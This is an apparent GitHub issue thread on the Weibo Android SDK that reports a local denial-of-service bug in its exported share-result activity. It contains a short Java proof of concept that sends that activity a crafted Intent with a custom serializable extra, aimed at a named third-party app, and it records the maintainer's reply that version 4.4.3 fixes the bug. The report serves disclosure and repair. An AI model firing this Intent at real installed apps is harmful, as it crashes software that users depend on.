### ISSUE TITLE
系统组件本地拒绝服务漏洞

### ISSUE THREAD

**Issue by cxcbupt** [sinaweibosdk/weibo_android_sdk#489]
系统组件本地拒绝服务漏洞--问题详情: com.sina.weibo.sdk.share.WbShareResultActivity

Intent intent=new Intent();
intent.setComponent(new ComponentName("com.tencent.qqsports", "com.sina.weibo.sdk.share.WbShareResultActivity"));
intent.putExtra("anykey",new AnySerializableClass());
startActivity(intent);

Android存在通用型拒绝服务问题，对任意key(存在或不存在的)传入一个自定义序列化对象，可导致应用处理异常而崩溃

**Comment by sinaweibosdk** [comment]
4.4.3fixed.
